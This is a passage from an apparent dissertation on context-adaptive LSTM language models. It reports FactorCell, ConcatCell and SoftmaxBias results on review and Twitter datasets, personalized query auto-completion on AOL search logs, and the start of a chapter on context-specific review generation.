in Table 4.3. In each of the four datasets, the FactorCell model gives the best perplexity. For classification accuracy, there is a bigger difference between the models, and the FactorCell model is the most accurate on three out of four datasets and tied with the SoftmaxBias model on AgNews. For DBPedia and TripAdvisor, most of the improvement in perplexity relative to the unadapted case is achieved by the SoftmaxBias model with smaller relative improvements coming from the increased power of the ConcatCell and FactorCell models. For Yelp, the perplexity improvements are small; the FactorCell model is just 1.3% better than the unadapted model. From (Yogatama et al., 2017), we see that for AGNews, much more so than for other 48 datasets, the unigram statistics capture the discriminating information, and it is the only dataset in that work where a naive Bayes classifier is competitive with the generative LSTM for the full range of training data. The fact that the SoftmaxBias model gets the same accuracy as the FactorCell model on this task suggests that topic context may benefit less from adapting the recurrent layer. For the DBPedia and Yelp datasets, the FactorCell model beats previously reported classification accuracies for generative models (Yogatama et al., 2017). However, it is not competitive with state-of-the-art discriminative models on these tasks with the full training set. With less training data, it probably would be, based on the results in (Yogatama et al., 2017). The numbers in Table 4.3 do not adequately convey the fact that there are hyperparame- ters with an effect on perplexity that is greater than the sometimes small relative differences between models. Even the seed for the random weight initialization can have a “major im- pact” on the final performance of an LSTM (Reimers and Gurevych, 2017). We use Figure 4.2 to show how the three classes of models perform across a range of hyperparameters. The figure compares perplexity on the x-axis with accuracy on the y-axis with both metrics computed on the development set. Each point in this figure represents a different instance of the model trained with random hyperparameter settings and the best results are in the upper right corner of each plot. The color/shape differences of the points correspond to the three classes of models: FactorCell, ConcatCell, and SoftmaxBias. Within the same model class but across different hyperparameter settings, there is much more variation in perplexity than in accuracy. The LSTM cell size is mainly responsible for this; it has a much bigger impact on perplexity than on accuracy. It is also apparent that the models with the lowest perplexity are not always the ones with the highest accuracy. Notably, improvements in perplexity are associated with a decrease in accuracy for the SoftmaxBias models on the DBPedia, TripAdvisor, and Yelp datasets. In Bowman et al. (2016), it was observed that the more powerful the decoder of a variational auto-encoder was the more likely it was to ignore the prior information given by the encoder. A similar effect 49 Figure 4.2: Accuracy vs. perplexity for different classes of models on the four word-based datasets. is happening here where when the recurrent layer size is increased then the model relies less on the unigram prior provided by the adapted softmax bias vector. See Section 4.3.4 for further hyperparameter analysis. Figure 4.3 is a visualization of the per-word log likelihood ratios between a model as- suming a 5 star review and the same model assuming a 1 star review. Likelihoods were computed using an ensemble of three models to reduce variance. The analysis is repeated for each class of model. Words highlighted in blue are given a higher likelihood under the 5 star assumption. Unigrams with strong sentiment such as “lovely” and “friendly” are well-represented by all three models. The reader may not consider the tokens “craziness” or “5-8pm” to be strong indicators of a positive review but the way they are used in this review is representative of 50 how they are typically used across the corpus. As expected, the ConcatCell and FactorCell model capture the sentiment of multi-token phrases. As an example, the unigram “enough” is 3% more likely to occur in a 5 star review than in a 1 star review. However, “do enough” is 30 times more likely to appear in a 5 star review than in a 1 star review. In this example, the FactorCell model does a better job of handling the word “enough.” 4.3.3 Character-based Models Next, we evaluate the EuroTwitter and GeoTwitter models using both perplexity and a classification task. For EuroTwitter, the classification task is to identify the language. With GeoTwitter, it is less obvious what the classification task should be because the context values are continuous and not categorical. We selected six cities and then assigned each sentence the label of the closest city in that list while still retaining the exact coordinates of the Tweet. There are two cities from each country: Manchester, London, Madrid, Barcelona, New York City, and Los Angeles. Tweets from locations further than 300 km from the nearest city in the list were discarded when evaluating the classification accuracy. The classification task is sufficient to investigate the properties of the language model but, unlike some prior work, it is not designed to capture geographic lexical variations in an easily interpretable manner (Eisenstein et al., 2010) nor is it designed to be efficient at geolocation (Han et al., 2014). Perplexities and classification accuracies are presented in Table 4.4. The FactorCell model has the lowest perplexity and the highest accuracy for both datasets. Again, the FactorCell model clearly improves on the ConcatCell as measured by classification accuracy. Consistent with our hypothesis, adapting the softmax bias is not effective for these small vocabulary character-based tasks. The SoftmaxBias model has small perplexity improvements (< 1%) and low classification accuracies. Figure 4.4 compares perplexity and classification accuracy for different hyperparameter settings of the character-based models. Again, we see that it is possible to trade-off some 51 SoftmaxBias ConcatCell FactorCell Figure 4.3: Log likelihood ratio between a model that assumes a 5 star review and the same model that assumes a 1 star review. Blue indicates a higher 5 star likelihood and red is a higher likelihood for the 1 star condition. 52 EuroTwitter GeoTwitter Model PPL ACC PPL ACC Unadapted 6.35 – 4.64 – SoftmaxBias 6.29 43.0 4.63 29.9 ConcatCell 6.17 91.5 4.54 42.2 FactorCell 6.07 93.3 4.52 63.5 Table 4.4: Perplexity and classification accuracies for the EuroTwitter and GeoTwitter datasets. perplexity for gains in classification accuracy. For EuroTwitter, if tuning is done on accuracy rather than perplexity then the accuracy of the best model is as high as 95%. 4.3.4 Hyperparameter Analysis The hyperparameter with the strongest effect on perplexity is the size of the LSTM. This was consistent across all six datasets. The effect on classification accuracy of increasing the LSTM size was mixed. Increasing the context embedding size generally helped with accuracy on all datasets, but it had a more neutral effect on TripAdvisor and Yelp and increased perplexity on the two character-based datasets. For the FactorCell model, increasing the rank of the adaptation matrix tended to lead to increased classification accuracy on all datasets and seemed to help with perplexity on AGNews, DBPedia, and TripAdvisor. Figure 4.5 compares the effect on perplexity of the LSTM parameter count and the Fac- torCell rank hyperparameters. Each point in those plots represents a separate instance of the model with varied hyperparameters. In the right subplot of Figure 4.5, we see that increasing the rank hyperparameter improves perplexity. This is consistent with our hypothesis that increasing the rank can let the model adapt more. The variance is large because differences in other hyperparameters (such as hidden state size) also have an impact. In the left subplot we compare the performance of the FactorCell with the ConcatCell as 53 Figure 4.4: Accuracy vs. Perplexity for different classes of models on the two character-based datasets. the size of the word embeddings and recurrent state change. The x-axis is the size of the W recurrent weight matrix, specifically 3(e + d)d for an LSTM with 3 gates. Since the adapted weights can be precomputed, the computational cost is roughly the same for points with the same x-value. For a fixed-size hidden state, the FactorCell model has a better perplexity than the ConcatCell. Since performance can be improved both by increasing the recurrent state dimension and/or by increasing rank, we examined the relative benefits of each. The perplexity of a FactorCell model with an LSTM size of 120K will improve by 5% when the rank is increased from 0 to 20. To get the same decrease in perplexity by changing the size of the hidden state would require 160K parameters, resulting in a significant computational advantage for the FactorCell model. Using a one-hot vector for adapting the softmax bias layer in place of the context em- bedding when adapting the softmax bias vector tended to have a large positive effect on accuracy leaving perplexity mostly unchanged. Recall from Section 2.3 that if the number of values that a context variable can take on is small then we can allow the model to choose between using the low-dimensional context embedding or a one-hot vector. This option is 54 Figure 4.5: Comparison of the effect of LSTM parameter count and FactorCell rank hyper- parameters on perplexity for DBPedia. not available for the TripAdvisor and the GeoTwitter datasets because the dimensionality of their one-hot vectors would be too large.4 The method of adapting the softmax bias is the main explanation for why some ConcatCell models performed significantly above/below the trendline for DBPedia in Figure 4.2. We experimented with an additional hyperparameter on the Yelp dataset, namely the inclusion of layer normalization (Ba et al., 2016). (We had ruled-out using layer normaliza- tion in preliminary work on the AGNews data before we understood that AGNews is not representative, so only one task was explored here.) Layer normalization significantly helped the perplexity on Yelp (≈ 2% relative improvement) and all of the top-performing models on the held-out development data had it enabled. 4.4 Analysis for Sparse Contexts The TripAdvisor data is an interesting case because the original context space is high di- mensional (3500 hotels × 5 user ratings) and sparse. Since the model applies end-to-end learning, we can investigate what the context embeddings learn. In particular, we looked at location (hotels are from 25 cities in the United States) and class of hotel, neither of which 4Another option for the TripAdvisor data is to use the hashing method from Section 3.2.2. 55 are input to the model. All of what it learns about these concepts come from extracting information from the text of the reviews. To visualize the embedding, we used a 2-dimensional principal component analysis (PCA) projection of the embeddings of the 3500 hotels. We found that the model learns to group the hotels based on geographic region; the projected embeddings for the largest cities are shown in Figure 4.6, plotting the 1.5σ ellipsoid of the Gaussian distribution of the points. (Actual points are not shown to avoid clutter.) Not only are hotels from the same city grouped together, cities that are close geographically appear close to each other in the embedding space. Cities in the Southwest appear on the left of the figure, the West coast is on top and the East coast and Midwest is on the right side. This is likely due in part to the impact of the region on activities that guests may mention, but there also appears to be a geographic sampling bias in the hotel class that may impact language use. Figure 4.7 shows the projected hotel embeddings in the same space as Figure 4.6 except that the points are now colored based on the hotel class. Class is a rating from an independent agency that indicates the level of service and amenities that customers can expect to receive at a hotel. Whereas, the star rating is the average score given to each establishment by the customers who reviewed it. Hotel class does not determine star rating although they are correlated (r = 0.54). The dataset does not contain a uniform sample of hotel classes from each city. The hotels included from Boston, Chicago, and Philly are almost exclusively high class and the ones from L.A. and San Diego happen to be low class, so the embedding distributions also reflect hotel class: lower class hotels towards the top left and higher class hotels towards the bottom right. The visualization for the ConcatCell and SoftmaxBias models are similar. Another way of understanding what the context embeddings represent is to compute the softmax bias projection Gc and examine the words that experience the biggest increase in probability. We show three examples in Table 4.5. In each case, the top words are strongly related to geography and include names of neighborhoods, local attractions, and other hotels in the same city. The top boosted words are relatively unaffected by changing the rating. 56 Figure 4.6: Distribution of a PCA projection of hotel embeddings from the TripAdvisor FactorCell model showing the grouping of the hotels by city. 57 Figure 4.7: Distribution of a PCA projection of the hotel embeddings from the TripAdvisor FactorCell model showing the grouping of hotels by class. 58 (Recall that the hotel identifier and the user rating are the only two inputs used to create the context embedding.) This table combined with the other visualizations indicates that location effects tend to dominate in the output layer, which may explain why the two models adapting the recurrent network seem to have a bigger impact on classification performance. Hotel City Class Rating Top Boosted Words Amalfi Chicago 4.0 5 amalfi, chicago, allegro, burnham, sable, michigan, acme, conrad, tal- bott, wrigley BLVD Hotel Suites Los Angeles 2.5 3 hollywood, kodak, highland, univer- sal, reseda, griffith, grauman’s, bev- erly, ventura Four Points Sheraton Seattle 3.0 1 seattle, pike, watertown, deca, nee- dle, pikes, pike’s monorail, uw, safeco Table 4.5: The top boosted words in the Softmax bias layer for different context settings in a FactorCell model. 4.5 Comparison to Related Work The studies that most directly relate to our work are neural models that correspond to special cases of the more general FactorCell model, including those that leverage what we call the SoftmaxBias model (Dieng et al., 2016; Tang et al., 2016; Yogatama et al., 2017; Ficler and Goldberg, 2017) and others that use the ConcatCell approach (Mikolov and Zweig, 2012; Wen et al., 2013; Chen et al., 2015; Ghosh et al., 2016). The FactorCell model is distinguished by having an additive (factored) context-dependent transformation of the recurrent layer weight matrix. A related additive context-dependent transformation has been proposed for log-bilinear sequence models (Eisenstein et al., 2011a; 59 Hutchinson et al., 2015), but these are less powerful than the RNN. Factored tensors have been successfully used in other NLP applications such as dependency parsing (Lei et al., 2014). A somewhat different use of low-rank factorization has previously been used to reduce the parameter count in an LSTM LM (Kuchaiev and Ginsburg, 2017), finding that the reduced number of parameters leads to faster training. Much of the work on context-adaptive neural language models has focused on incorpo- rating document or topic information (Mikolov and Zweig, 2012; Ji et al., 2015; Ghosh et al., 2016; Dieng et al., 2016), where context is defined in terms of word or n-gram statistics. Our work differs from these studies in that the context is defined by a variety of sources, including discrete and/or continuous metadata, which is mapped to a context vector in end-to-end training. Context-sensitive language models for text generation tend to involve other forms of context similar to the objective of our work, including speaker characteristics (Luan et al., 2016; Li et al., 2016), dialog act (Wen et al., 2015), sentiment and other fac- tors (Tang et al., 2016; Hu et al., 2017), and style (Ficler and Goldberg, 2017). Our work is distinctive in assessing performance over a broad variety of context variables. 4.6 Summary In summary, this chapter has introduced a new model for adapting (or controlling) a lan- guage model depending on contextual metadata. The FactorCell model extends prior work with context-dependent RNNs by using the context vector to generate a low-rank, factored, additive transformation of the recurrent cell weight matrix. Experiments with six tasks show that the FactorCell model matches or exceeds performance of alternative methods in both perplexity and text classification accuracy. Findings hold for a variety of types of context, including high-dimensional contexts, and the adaptation of the recurrent layer is particularly important for character-level models. For many contexts, the benefit of the FactorCell model comes with essentially no additional computational cost at test time, since the transforma- tions can be pre-computed. Analyses of a dataset with a high-dimensional sparse context vector show that the model learns context similarities to facilitate parameter sharing. 60 An adapted language model needs to memorize information about the unique language patterns of each context. One way of thinking about the difference between the ConcatCell and the FactorCell models is to ask where in the model is that information encoded. The context embedding c has too few bits to hold much information by itself. The same is true for the ConcatCell’s Q matrix from Equation 3.1. The information must be held inside the shared weight matrix W. This exposes a weakness of the ConcatCell model. If only one context is being used at a time why should the weights for all the contexts be active all the time? The FactorCell model has many extra parameters stored in the ZL and ZR tensors. It is able to offload context specific information to these locations and only use it when it is needed. The models evaluated here were tuned to minimize perplexity, as is typical for language modeling. In analyses of performance with different hyperparameter settings, we find that perplexity is not always positively correlated with accuracy, but the criteria are more often correlated for approaches that adapt the recurrent layer. While not surprising, the results raise concerns about using perplexity as the sole evaluation metric for context-aware lan- guage models. More work is needed to understand the relative utility of these objectives for language model design, which we address in Chapter 6. In real applications, it is possible for the meaning of the contexts to shift over time and the adapted model becomes out-of-date. To fix this, the model needs to be replenished by re-training with new data or it can be updated continuously using online learning. We address the latter of these two strategies in the next chapter. 61 Chapter 5 PERSONALIZED QUERY AUTO-COMPLETION 5.1 Background This chapter demonstrates the benefits of the FactorCell model on the real-world task of query auto-completion (QAC).1 QAC is a feature used by search engines that provides a list of suggested queries for the user as they are typing. For instance, if the user types the prefix “mete” then the system might suggest “meters” or “meteorite” as completions. This feature can save the user time and reduce cognitive load (Cai et al., 2016). Most approaches to QAC are extensions of the Most Popular Completion (MPC) algo- rithm (Bar-Yossef and Kraus, 2011). MPC suggests completions based on the most popular queries in the training data that match the specified prefix. One way to improve MPC is to consider additional signals such as temporal information (Shokouhi and Radinsky, 2012; Whiting and Jose, 2014) or information gleaned from a users’ past queries (Shokouhi, 2013). This chapter deals with the latter of those two signals, i.e. personalization. Personaliza- tion relies on the fact that query likelihoods are drastically different among different people depending on their needs and interests. Recently, (Park and Chiba, 2017) suggested a significantly different approach to QAC. In their work, completions are generated from a character LSTM language model instead of by ranking completions retrieved from a database, as in the MPC algorithm. This approach is able to complete queries whose prefixes were not seen during training and has significant memory savings over having to store a large query database. Building on this work, we consider the task of personalized QAC using an LSTM language model, combining the obvious advantages of personalization with the effectiveness of the 1The content of this chapter draws from our previously published work (Jaech and Ostendorf, 2018b). 62 language model in handling rare and previously unseen prefixes. The model must learn how to extract information from a user’s past queries and use it to adapt the generative model for that person’s future queries. User information is held in the form of a low- dimensional embedding that represents the person’s interests and latent demographic factors. The experiments demonstrate that by allowing a greater fraction of the parameters to change in response to the user embeddings, the FactorCell has an advantage over the traditional approach to RNN language model adaptation that increases as more examples from the user are seen. This task is different from the experiments described in Chapter 4 because new contexts (users) can emerge after the model has been trained and deployed. We introduce a mechanism to do online learning of the user embeddings, something that has not been addressed in prior work on language model adaptation. Table 5.1 provides an anecdotal example from the trained FactorCell model to demonstrate the intended behavior. The table shows the top five completions for the prefix “ba” in a cold start scenario and again after the user has completed five sports related queries. In the warm start scenario, the “baby names” and “babiesrus” completions no longer appear in the top five and have been replaced with “basketball” and “baseball”. In the online learning scenario, the FactorCell model makes efficient use of the user query history to quickly improve the quality of the auto-completions. While the standard implementation of MPC can not handle unseen prefixes, there are variants which do have that ability. Park and Chiba (2017) find that the neural LM out- performs MPC even when MPC has been augmented with the approach from Mitra and Craswell (2015) for handling rare prefixes. There has also been work on personalizing MPC (Shokouhi, 2013; Cai et al., 2014). We did not compare against these specific models because our goal was to show how personalization can improve the already-proven generative neural model approach. RNN’s have also previously been used for the related task of next query suggestion (Sordoni et al., 2015). Wang et al. (2018) show how spelling correction can be integrated into an RNN language model query auto-completion system and how the completions can be generated in real 63 Cold Start Warm Start 1 bank of america bank of america 2 barnes and noble basketball 3 babiesrus baseball 4 baby names barnes and noble 5 bank one baltimore Table 5.1: Top five completions for the prefix ba for a cold start model with no previous queries from that user and a warm model that has seen the queries espn, sports news, nascar, yankees, and nba. time using a GPU. Our method of updating the model during evaluation resembles work on dynamic evaluation for language modeling (Krause et al., 2017), but differs in that only the user embeddings (latent demographic factors) are updated. If the rest of the model is allowed to update then either some user embedding can become stale or there will be a large memory cost to hold different versions of the model for each person. One possibility would be to allow the full model to update and also implement a policy to invalidate stale user embeddings but that is beyond the scope of this work. 5.2 Model Adaptation depends on learning an embedding for each user, which we discuss in Section 5.2.1, and then using that embedding to adjust the weights of the recurrent layer, discussed in Section 5.2.2. 5.2.1 Learning User Embeddings During training, we learn an embedding for each of the users. We think of these embeddings as holding latent demographic factors for each user. Users who have less than 15 queries in the training data (around half the users but less than 13% of the queries) are grouped 64 together as a single entity, user1, leaving k users. The user embeddings matrix Uk×m, where m is the user embedding size, is learned via back-propagation as part of the end-to-end model. The embedding for an individual user is the ith row of U and is denoted by ui. The user embedding plays the same role as the context embedding from Section 2.3.1 that elsewhere is denoted by c. It is important to be able to apply the model to users that are not seen during training. This is done by online updating of the user embeddings during evaluation. When a new person, userk+1 is seen, a new row is added to U and initialized to u1. Each person’s user embedding is updated via back-propagation every time they select a query. When doing online updating of the user embeddings, the rest of the model parameters (everything except U) are frozen. The learning rate for the online updating should be different than the one used for training the rest of the model. When training the full model, the goal is to converge to a global minimum. During online updating the user embeddings do not converge to a fixed point but continue to track the query history. The optimal learning rate must be found using validation data. 5.2.2 Recurrent Layer Adaptation We consider three model architectures which differ only in the method for adapting the recurrent layer. First is the unadapted LM, analogous to the model from Park and Chiba (2017), which does no personalization. The second architecture is the ConcatCell, which concatenates a user embedding to the character embedding at every step of the input to the recurrent layer. For the third model, we test the FactorCell’s ability to let the user embedding transform the weights of the recurrent layer. Unlike the previous chapter, we do not incorporate the ConcatCell adaptation of the recurrent layer bias when using the FactorCell model. We found that this was unnecessary in preliminary experiments. When operating at the character-level, the unigram distribution is not particularly in- formative of the differences between users. This is unlike the word-level models, where the 65 unigram distribution can carry topic information. For this reason, we do not employ any of the techniques from Chapter 4 for adapting the softmax bias vector. 5.3 Data The experiments make use of the AOL Query data collected over three months in 2006 (Pass et al., 2006). The first six of the ten files were used for training. This contains approximately 12 million queries from 173,000 users for an average of 70 queries per user (median 15). A set of 240,000 queries from those same users (2% of the data) was reserved for tuning and validation. From the remaining files, one million queries from 20,000 users are used to test the models on a disjoint set of users. The chronological ordering of the queries is ignored during training but respected during testing. Our results are not directly comparable to Park and Chiba (2017) or Mitra and Craswell (2015) due to differences in the partitioning of the data and the method for selecting random prefixes. Prior work partitions the data by time instead of by user. Splitting by users is necessary in order to properly test personalization over longer time ranges. 5.4 Experiments 5.4.1 Experiment Details The vocabulary consists of 79 characters including special start and stop tokens. Models were trained for six epochs. The Adam optimizer is used during training with a learning rate of 10−3 (Kingma and Ba, 2014). The language model is a single-layer character-level LSTM with coupled input and forget gates and layer normalization (Melis et al., 2018; Ba et al., 2016). We do experiments on two model configurations: small and large. The small models use an LSTM hidden state size of 300 and 20 dimensional user embeddings. The large models use a hidden state size of 600 and 40 dimensional user embeddings. Both sizes use 24 dimensional character embeddings. For the small sized models, we experimented with different values of the FactorCell rank hyperparameter between 30 and 50 dimensions 66 finding that bigger rank is better. The large sized models used a fixed value of 60 for the rank hyperparemeter. During training only and due to limited computational resources, queries are truncated to a length of 40 characters. The model2 is implemented using Tensorflow. When updating the user embeddings during evaluation, we found that it is easier to use an optimizer without momentum. We use Adadelta (Zeiler, 2012) and tune the online learning rate to give the best perplexity on a held-out set of 12,000 queries, having previously verified (See Figure 5.1) that perplexity is a good indicator of performance on the QAC task. The learning rate is the only parameter that needs to be tuned for online learning. Prefixes are selected uniformly at random with the constraint that they contain at least two characters in the prefix and that there is at least one character in the completion. To generate completions using beam search, we use a beam width of 100 and a branching factor of 4. Results are reported using mean reciprocal rank (MRR), the standard method of evaluating QAC systems. It is the mean of the reciprocal rank of the true completion in the top ten proposed completions. The reciprocal rank is zero if the true completion is not in the top ten. Neural models are compared against an MPC baseline. Following (Park and Chiba, 2017), we remove queries seen less than three times from the MPC training data to avoid excessive memory usage. 5.4.2 Results The training objective, minimizing perplexity, differs from the evaluation metric, maximizing the mean reciprocal rank of the query completion. Fortunately, the mismatch between met- rics is not large. As shown in Figure 5.1, perplexity correlates with MRR on the development data. Table 5.2 compares the performance of the different models against the MPC baseline on a test set of one million queries from a user population that is disjoint with the training set. 2Code is available at http://github.com/ajaech/query completion. 67 Figure 5.1: Perplexity versus MRR on the development data for different classes of models. Results are presented separately for prefixes that are seen or unseen in the training data. If the prefix was not seen in the training data then the query is guaranteed to be relatively rare. Consistent with prior work, the neural models do better than the MPC baseline. The personalized models are better than the unadapted one, and the FactorCell model is the best overall in both the big and small sized experiments. Figure 5.2 shows the relative improvement in MRR over an unpersonalized model versus the number of queries seen per user. Both the FactorCell and the ConcatCell show continued improvement as more queries from each user are seen, and the FactorCell outperforms the ConcatCell by an increasing margin over time. In the long run, we expect that the system will have seen many queries from most users. Therefore, the right side of Figure 5.2, where the FactorCell is up to 2% better than the ConcatCell, is more representative of the relative performance of the two systems. Since the data was collected over a limited time frame and half of all users have fifteen or fewer queries, the results in Table 5.2 do not reflect the full benefit of personalization. Figure 5.3 shows the MRR for different prefix and query lengths. We find that longer 68 Size Model Seen Unseen All MPC .292 .000 .203 Unadapted .292 .256 .267 (S) ConcatCell .296 .263 .273 FactorCell .300 .264 .275 Unadapted .324 .286 .297 (B) ConcatCell .330 .298 .308 FactorCell .335 .298 .309 Table 5.2: MRR reported for seen and unseen prefixes for small (S) and big (B) models. Figure 5.2: Relative improvement in MRR over the unpersonalized model versus queries seen using the large size models. Plot uses a moving average of width 9 to reduce noise. 69 Figure 5.3: MRR by prefix and query lengths for the large FactorCell and unadapted models with the first 50 queries per user excluded. prefixes help the model make longer completions and (as expected) shorter completions have higher MRR. Comparing the personalized model against the unpersonalized baseline, we see that the biggest gains are for short queries and prefixes of length one or two. We found that one reason why the FactorCell outperforms the ConcatCell is that it is able to pick up sooner on the repetitive search behaviors that some users have. This commonly happens for navigational queries like when someone searches for the name of their favorite website once or more per day. At the extreme tail there are users who search for nothing but free online poker. Both models do well on these highly predictable users but the FactorCell is generally a bit quicker. We conducted an analysis to better understand what information is represented in the user embeddings and what makes the FactorCell different from the ConcatCell. From a cold start user embedding we ran two queries and allowed the model to update the user embedding. Then, we ranked the most frequent 1,500 queries based on the ratio of their likelihood from before and after updating the user embeddings. Tables 5.3, 5.4, and 5.5 show the queries with the highest relative likelihood of the adapted vs. unadapted models after two related search queries: “high school softball” and 70 FactorCell ConcatCell 1 high school musical horoscope 2 chris brown high school musical 3 funnyjunk.com homes for sale 4 funbrain.com modular homes 5 chat room hair styles Table 5.3: The five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “high school softball” and “math homework help”. “math homework help” for Table 5.3, “Prada handbags” and “Versace eyewear” for Table 5.4, and “discount flights” and “Yellowstone vacation packages” for Table 5.5. In all cases, the FactorCell model examples are more semantically coherent than the ConcatCell examples. In the first case, the FactorCell model identifies queries that a high school student might make, including entertainment sources and a celebrity entertainer popular with that demographic. In the second case, the FactorCell model chooses retailers that carry woman’s apparel and those that sell home goods. While these companies’ brands are not as luxurious as Prada or Versace, most of the top luxury brand names do not appear in the top 1,500 queries and our model may not be capable of being that specific. There is no obvious semantic connection between the highest likelihood ratio phrases for the ConcatCell; it seems to be focusing more on orthography than semantics (e.g. “home” in the first example). In the last case, the FactorCell suggests a map and four different airlines and the ConcatCell suggests a flight tracker (unlikely to be useful to someone looking to buy a ticket), a bank, and three reformulations of the original “discount flights” query. Not shown are the queries which experienced the greatest decrease in likelihood. For the “high school” case, these included searches for travel agencies and airline tickets—websites not targeted towards the high school age demographic. 71 FactorCell ConcatCell 1 neiman marcus craigslist nyc 2 pottery barn myspace layouts 3 jc penney verizon wireless 4 verizon wireless jensen ackles 5 bed bath and beyond webster dictionary Table 5.4: The five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “prada handbags” and “versace eyewear”. FactorCell ConcatCell 1 yahoo maps flight tracker 2 delta airlines suntrust bank 3 alaska airlines cheap tickets 4 us airways airline tickets 5 southwest airlines cheap flights Table 5.5: The five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “discount flights” and “yellowstone vacation packages”. 72 5.5 Summary Our experiments show that the LSTM model can be improved using personalization. The method of adapting the recurrent layer clearly matters and we obtained an advantage by using the FactorCell model. The reason the FactorCell does better is in part attributable to having two to three times as many parameters in the recurrent layer as either the ConcatCell or the unadapted models. By design, the adapted weight matrix W′ only needs to be computed at most once per query and is reused many thousands of times during beam search. As a result, for a given number of floating point operations, the FactorCell model outperforms the ConcatCell model for LSTM adaptation. The cost for updating the user embeddings is similar to the cost of the forward pass and depends on the size of the user embedding, hidden state size, FactorCell rank, and query length. In addition, we note that updates can be less frequent to reduce costs and in most cases there will be time between queries for updates. We showed that language model personalization can be effective even on users who are not seen during training. The benefits of personalization are immediate and increase over time as the system continues to leverage the incoming data to build better user representations. The approach can easily be extended to include time as an additional conditioning factor. We leave the question of whether the results can be improved by combining the language model with MPC for future work. 73 Chapter 6 CONTEXT-SPECIFIC TEXT GENERATION Context-specific generation is when a generative model is designed such that stylistic, topical, or other properties of the text can be specified when sampling from the model. One of the weaknesses of RNN language models is that it is difficult to control the content or the style of the text that they produce. It is natural to expect that if a language model is conditioned on a particular context then it will produce text that is appropriate for that context. Conditioning, or adapting to, context is one way of controlling generation (Ficler and Goldberg, 2017) and that is the application that we explore in this chapter. We conduct experiments and analysis using the Yelp restaurant review and the TripAd- visor hotel review datasets from Section 4.2. These experiments reuse the models that were trained for the experiments in Section 4.3, including models adapted using the SoftmaxBias, ConcatCell, and FactorCell strategies. The focus of the experiments in this chapter is to highlight differences in context-specificity between these models by generating reviews from the models and checking if the text is appropriate for the given context. The generated reviews are judged using a classifier that has been trained for that purpose. The automatic judgments are supplemented by human ratings to confirm the reliability of the classifier. There are ways of producing context-specific text without generating it from a language model such as by retrieving examples with matching context from the training data or combining retrieval with a neural edit model (Li et al., 2018). Our context-specificity metric will highly reward these types of models or any model that produces easy to classify content even if that content is unnatural or an outlier. Retrieval-based methods may work well in certain applications but others require the use of a language model. This chapter focuses specifically on language models. We emphasize that a context-specificity metric by itself 74 is not enough to judge the quality of a language model. Low perplexity is important for good generation. However, a language model that has low perplexity and is also capable of context-specific generation will have more applications than a non-context-specific model. 6.1 Text Generation To generate text from an RNN, we use the model to predict the probability of observing each possible word as the next token in the sequence starting by inputting a special start of sentence token for w1. The next token probabilities are given by the yt vector from Equation 2.3. One option is to take the next word as the highest probability entry in yt, known as greedy decoding. Making greedy decisions can lead us down a path that is globally suboptimal and may not result in finding the sequence with the highest overall likelihood. Instead, using an algorithm known as beam search, several possibilities are considered for the next word and are placed in a queue that holds the most likely word sequences found so far. Beam search can find many high probability sentences but oftentimes it suffers from a lack of diversity. The highest probability sequences will all have considerable overlap with each other. This is not desirable in text generation because we generally want multiple texts with non-trivial differences to pick from and also because excessive repetition is tedious for human readers. A simple tweak that leads to more diverse generation is to stochastically expand the beam by sampling l items from the multinomial distribution given by yt instead of deterministically picking the top l words. When we use this technique we refer to it as a stochastic beam search. We can trade-off between the stochastic and deterministic versions of beam search by using a temperature parameter T in the softmax function as follows: softmax(xi) = exp(−xi T )∑ j exp(− xj T ) . (6.1) Lowering the temperature T increases the concentration of probability mass at the head of the distribution. If the temperature is too high then the generated text can be nonsensical. If it is too low then the generation lacks diversity. In the limit when T goes to zero, it 75 becomes equivalent to greedy decoding. So, finding the right balance is important. Stochastic beam search deals with repetition between sampled texts. RNN language models also tend to use the same phrase repetitively within a single sentence or document, e.g. a restaurant review that says “The food was good and the service was great and the food was good and...”. To deal with this we use a heuristic that does not consider any beam expansion that would create a repeated trigram. Several sophisticated techniques and heuristics exist (such as adding random penalties to subsets of the vocabulary (Juuti et al., 2018) or having special models trained to enforce relevance and avoid contradiction and repetition (Holtzman et al., 2018)) but banning repeated trigrams is sufficient for our purpose of making a comparison between adaptation methods. 6.2 Illustrative Examples To start, we provide anecdotal examples in Tables 6.1, 6.2, and 6.3 illustrating the behavior of each adaptation technique when generating Yelp restaurant reviews given a star rating. In each case, a sentence template was selected and beam search decoding was used to find the highest probability word sequence that fits the gap in the template. This was repeated once for each of the possible star ratings from one to five. The sentence completions from the FactorCell model are better matched to the specified star ratings. Table 6.2 is probably the best example for the intensity of the selected adjectives to match with the corresponding star ratings. On the other hand, when using the ConcatCell model there is not a clear distinction between ratings. The ConcatCell picks the same completion for multiple star ratings (“loved it” in Table 6.1 and “great!” in Table 6.2) and in Table 6.3 it gets the wrong polarity for the 5 star rating completion. 76 Context FactorCell ConcatCell SoftmaxBias 5 stars it was amazing loved it ! it was amazing ! 4 stars loved it ! loved it ! it was delicious 3 stars it was great ! loved it ! had a blast 2 stars it was horrible ! had a blast was disappointed 1 star it was horrible ! it was horrible ! was disappointed Table 6.1: Top completions for the sentence “My boyfriend and I ate here and !” after conditioning on each star rating. Context FactorCell ConcatCell SoftmaxBias 5 stars amazing ! great ! delicious 4 stars great ! great ! delicious 3 stars good ! great ! delicious 2 stars just meh mediocre mediocre 1 star awful mediocre mediocre Table 6.2: Top completions for the sentence “This was my first time coming here and the food was ” after conditioning on each star rating. Context FactorCell ConcatCell SoftmaxBias 5 stars be back never go here never go here 4 stars be back go never go here 3 stars go back go never go here 2 stars never go here never never go here 1 star never go here never never go Table 6.3: Top completions for the sentence “I will again” after conditioning on each star rating. 77 6.3 Experiments and Analysis 6.3.1 Yelp Restaurant Reviews To quantify the differences between models, we sampled 2,000 Yelp reviews from 36 different models. The models differ in their adaptation method but also in their LSTM size and other hyperparameters including random word embedding sizes, epochs, context embedding size and FactorCell rank. Having variation in the hyperparameter settings allows us to analyze the relationship between perplexity and context-specificity, among other things. The generation used stochastic beam search with a temperature of 1.0, a beam width of 8 and a total beam size of 120. Only the first 70 words of the review were generated and the beam was constrained to not allow repeated trigrams as a heuristic to avoid excessive repetition. A discriminative classifier was trained to predict star rating on the same data that was used to train the language models. We used the fastText model because it is near state-of-the-art and it can be efficiently trained and evaluated (Grave et al., 2017b). This classifier was used to judge the generated reviews to see if they conform to their given ratings. This strategy was used by Hu et al. (2017) to evaluate “controllable” text generation. It is also similar to the text generation evaluation used by Ficler and Goldberg (2017) except that for some attributes they used hand-crafted decision rules instead of a statistical classifier and for other attributes deemed too difficult to classify they 